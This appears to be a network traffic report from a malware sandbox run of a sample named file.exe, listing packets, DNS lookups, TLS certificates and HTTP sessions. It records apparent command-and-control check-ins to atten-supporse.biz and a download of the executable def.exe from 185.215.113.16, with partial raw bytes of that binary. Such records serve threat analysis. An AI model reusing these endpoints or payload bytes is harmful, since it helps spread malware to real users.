                                                                                                                                                                                    Nov 29, 2024 19:50:35.395324945 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.892618895 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.892719984 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.892817974 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.893043041 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.893059969 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:40.173897028 CET4970380192.168.2.6199.232.210.172
                                                                                                                                                                                    Nov 29, 2024 19:50:40.173908949 CET49701443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:50:40.295489073 CET8049703199.232.210.172192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:40.295566082 CET4970380192.168.2.6199.232.210.172
                                                                                                                                                                                    Nov 29, 2024 19:50:40.295744896 CET4434970140.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:40.295794010 CET49701443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:50:45.907368898 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:50:46.027884960 CET4434970540.126.53.7192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:46.028028011 CET49705443192.168.2.640.126.53.7
                                                                                                                                                                                    Nov 29, 2024 19:50:49.267687082 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:49.267721891 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:49.267848969 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:49.268049002 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:49.268064022 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:51.006804943 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:51.007111073 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:51.007128000 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:51.007477045 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:51.007853031 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:51.007930040 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:51.048553944 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:51:00.690273046 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:00.690365076 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:00.690577030 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:51:01.643872023 CET49891443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:51:01.643889904 CET44349891172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:05.703094959 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:05.703133106 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:05.703191996 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:05.704044104 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:05.704057932 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.240339994 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.240447998 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.242202997 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.242209911 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.243196011 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.247390032 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.247442007 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.247448921 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.247566938 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.291337013 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.927293062 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.927429914 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:51:08.927522898 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.927669048 CET49892443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:51:08.927689075 CET4434989220.198.119.143192.168.2.6
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Nov 29, 2024 19:49:06.276253939 CET4995053192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:06.589490891 CET53499501.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.493653059 CET53627101.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.535707951 CET53634961.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.296359062 CET53515921.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.204020977 CET5688453192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:49.204324007 CET5317153192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:49.343306065 CET53531711.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.343797922 CET53568841.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.573376894 CET5996253192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:52.573502064 CET6072853192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:55.877230883 CET5854953192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:49:55.877408981 CET5836953192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:50:01.130067110 CET53503821.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.656609058 CET5507053192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:50:03.656764030 CET5288353192.168.2.61.1.1.1
                                                                                                                                                                                    Nov 29, 2024 19:50:05.705657959 CET53584171.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:24.782679081 CET53537141.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:44.598141909 CET53600731.1.1.1192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:47.782162905 CET53496321.1.1.1192.168.2.6
                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                    Nov 29, 2024 19:49:52.987514019 CET192.168.2.61.1.1.1c2c3(Port unreachable)Destination Unreachable
                                                                                                                                                                                    Nov 29, 2024 19:50:00.900506020 CET192.168.2.61.1.1.1c29e(Port unreachable)Destination Unreachable
                                                                                                                                                                                    Nov 29, 2024 19:50:08.426528931 CET192.168.2.61.1.1.1c266(Port unreachable)Destination Unreachable
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Nov 29, 2024 19:49:06.276253939 CET192.168.2.61.1.1.10x4950Standard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:49.204020977 CET192.168.2.61.1.1.10x7a6bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:49.204324007 CET192.168.2.61.1.1.10xc8fbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.573376894 CET192.168.2.61.1.1.10x1f9eStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.573502064 CET192.168.2.61.1.1.10x8f4Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.877230883 CET192.168.2.61.1.1.10x3a20Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.877408981 CET192.168.2.61.1.1.10x6ff9Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:03.656609058 CET192.168.2.61.1.1.10x9bcaStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:03.656764030 CET192.168.2.61.1.1.10x198eStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Nov 29, 2024 19:49:06.589490891 CET1.1.1.1192.168.2.60x4950No error (0)atten-supporse.biz104.21.16.9A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:06.589490891 CET1.1.1.1192.168.2.60x4950No error (0)atten-supporse.biz172.67.165.166A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:49.343306065 CET1.1.1.1192.168.2.60xc8fbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:49.343797922 CET1.1.1.1192.168.2.60x7a6bNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.713987112 CET1.1.1.1192.168.2.60x1f9eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.713987112 CET1.1.1.1192.168.2.60x1f9eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.713987112 CET1.1.1.1192.168.2.60x1f9eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.713987112 CET1.1.1.1192.168.2.60x1f9eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.891594887 CET1.1.1.1192.168.2.60x75caNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.983494043 CET1.1.1.1192.168.2.60x8f4No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:52.983494043 CET1.1.1.1192.168.2.60x8f4No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:53.012478113 CET1.1.1.1192.168.2.60xf017No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:53.012478113 CET1.1.1.1192.168.2.60xf017No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:53.012478113 CET1.1.1.1192.168.2.60xf017No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.879931927 CET1.1.1.1192.168.2.60xfadcNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882244110 CET1.1.1.1192.168.2.60x861cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882244110 CET1.1.1.1192.168.2.60x861cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882244110 CET1.1.1.1192.168.2.60x861cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020859003 CET1.1.1.1192.168.2.60x3a20No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020859003 CET1.1.1.1192.168.2.60x3a20No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020859003 CET1.1.1.1192.168.2.60x3a20No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020859003 CET1.1.1.1192.168.2.60x3a20No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020870924 CET1.1.1.1192.168.2.60x6ff9No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:49:56.020870924 CET1.1.1.1192.168.2.60x6ff9No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:04.153989077 CET1.1.1.1192.168.2.60x9bcaNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:04.156438112 CET1.1.1.1192.168.2.60x198eNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:08.263232946 CET1.1.1.1192.168.2.60x2938No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:08.426419973 CET1.1.1.1192.168.2.60x9dd4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:15.025409937 CET1.1.1.1192.168.2.60x985eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Nov 29, 2024 19:50:15.025732994 CET1.1.1.1192.168.2.60x37c0No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    • atten-supporse.biz
                                                                                                                                                                                    • otelrules.azureedge.net
                                                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                                                    • fs.microsoft.com
                                                                                                                                                                                    • https:
                                                                                                                                                                                      • js.monitor.azure.com
                                                                                                                                                                                      • wcpstatic.microsoft.com
                                                                                                                                                                                    • 185.215.113.16
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.649755185.215.113.16801656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Nov 29, 2024 19:49:32.934181929 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313736916 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:34 GMT
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Content-Length: 2799616
                                                                                                                                                                                    Last-Modified: Fri, 29 Nov 2024 18:37:00 GMT
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    ETag: "674a09cc-2ab800"
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 15 07 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                    Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `++`Ui` @ @.rsrc`2@.idata 8@ltedtzog`*X*:@bxhrajpy +*@.taggant@ +"*@
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313926935 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313939095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313951969 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313962936 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313975096 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314208984 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314265013 CET1236INData Raw: f8 df 0b 5f 00 82 0c 18 99 b3 0a a0 89 5d e8 0d f5 36 02 fe 35 98 ee bd 44 ed d0 20 cf 38 61 2a 21 6b b7 79 ca 5a a2 3d f1 32 c8 07 9a 94 7c 1d 66 ec 2c 0e 22 e9 0f c2 97 9a 09 c4 67 e4 53 2b 5a e1 1c 5e 00 e6 18 66 34 bd 2b c8 85 c3 09 af 52 0a
                                                                                                                                                                                    Data Ascii: _]65D 8a*!kyZ=2|f,"gS+Z^f4+RE0|Y,y$1]!z/\LF)%4~J78FZ&0 fe+[Ywd2Nw/z8\0"dY[)#f"lD9jY9m#C6,FK&
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314277887 CET1236INData Raw: e4 de 32 68 bc de 26 fc f4 13 ab 07 7f cb 30 91 56 d3 1c 04 08 98 ce 00 46 66 c7 57 5c ab 16 5f 56 d3 d6 fd f7 8b da 5c ed d8 98 df 5c de f2 5d 56 7f 32 50 08 a7 02 0a 2a 42 fd 43 54 cb 8e 28 06 ca b6 a3 7f 5f 20 d6 5c 6b 3f 5f 16 ba 96 af 0e 23
                                                                                                                                                                                    Data Ascii: 2h&0VFfW\_V\\]V2P*BCT(_ \k?_#;(nGfOAwUt7fVZn[n6Yg _nv-V5`vQI'dA(HL&@_(m%[X_5k(H*\vs`
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314292908 CET1236INData Raw: 1d c1 1b 59 02 a3 32 2d 29 86 62 5d 91 07 22 8b 8b d8 34 50 4c ee c6 b8 80 75 e1 40 2b 03 f8 b9 32 c6 e0 4e 8a 62 d5 1a e7 74 77 2c 76 b9 d7 e8 26 eb f6 6d 7c 88 a3 3b 66 db 90 3b 37 78 02 a5 0e ee fe 10 68 74 e6 56 8d 31 b7 5e 14 4e 3c ac d9 05
                                                                                                                                                                                    Data Ascii: Y2-)b]"4PLu@+2Nbtw,v&m|;f;7xhtV1^N<}.$,B`mx UyJ(`&F^tm*6+X4`v]'6dd^H7-6+g#28mt4Y|f(.U; s127 83Ud~0h.u
                                                                                                                                                                                    Nov 29, 2024 19:49:34.434178114 CET1236INData Raw: 94 a6 6b b3 6e b7 11 24 6a 43 08 1b b3 d7 d4 fe 79 ee 20 9f 7a b7 f2 2f 87 d1 7e 37 7d e6 6d 0e 7a e7 e8 51 57 ba c4 ec 09 02 7e 48 1b 28 30 91 55 1d fb 5a 1d 89 2a 20 56 d9 24 6b 34 7a fe 51 84 7c ec 5c 2a 78 f3 d0 d6 be 0d ef c6 84 01 9d 36 03
                                                                                                                                                                                    Data Ascii: kn$jCy z/~7}mzQW~H(0UZ* V$k4zQ|\*x6-rF! 78rAt2EBXDtQPm7"E7AZ.l~`&+*51`<6|"'Q-.e*ihG9l6a+VT8ryz2=Y0oZ*=7o#


                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                    Nov 29, 2024 19:49:47.256968021 CET13.107.246.63443192.168.2.649769CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                                                                                                                                                    CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
                                                                                                                                                                                    CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.649707104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:08 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                    2024-11-29 18:49:08 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:08 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=qj7vtb6npmhjblhj8ab3u7e3oh; expires=Tue, 25-Mar-2025 12:35:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Sw5DKI6La25CxqpZRucVzEeiw09fcplnSghj5bNSEspagx%2FgxKCLxceJPHnHuoeBruj2Rzxorl3rVasnBr6rISUgpZcMjfeFUljqy05jHvHvpQyEA%2FniCS7V1k1lm120MGqLA8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6a25caa4239-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1610&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1813664&cwnd=229&unsent_bytes=0&cid=4f4eaf664254e50b&ts=812&x=0"
                                                                                                                                                                                    2024-11-29 18:49:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                    2024-11-29 18:49:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    1192.168.2.64970820.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
